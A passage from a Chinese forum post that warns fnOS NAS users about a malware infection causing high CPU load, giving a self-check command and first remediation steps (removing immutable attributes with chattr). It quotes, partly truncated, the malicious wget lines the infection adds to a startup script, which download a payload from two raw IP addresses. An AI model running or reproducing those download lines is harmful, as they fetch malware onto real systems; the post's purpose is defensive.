大家注意一下，飞牛(fnOS)如果莫名其妙CPU高，赶紧自查！ 
我自己搞了2个设备，刚确认有1个已经“中奖”了。 
1. 自查有没有中招？ 
在终端运行： 
cat /usr/trim/bin/system_startup.sh

如果输出内容的最下面有这几行 IP 下载命令，基本中奖了： 
wget http://151.240.13.91/turmp ... 
wget http://43.198.11.122/turmp ... 
或者直接用大神的一键检测&修复脚本：飞牛0day专杀脚本 · GitHub 
2. 解决办法（重点） 
病毒会把文件锁死（加 immutable 属性），导致 root 权限也删不掉。 
第一步：批量解锁文件 
复制下面这串命令运行(具体根据脚本查出来的，下面是我查出来我的)： 
chattr -i /usr/sbin/gots /usr/bin/ngi...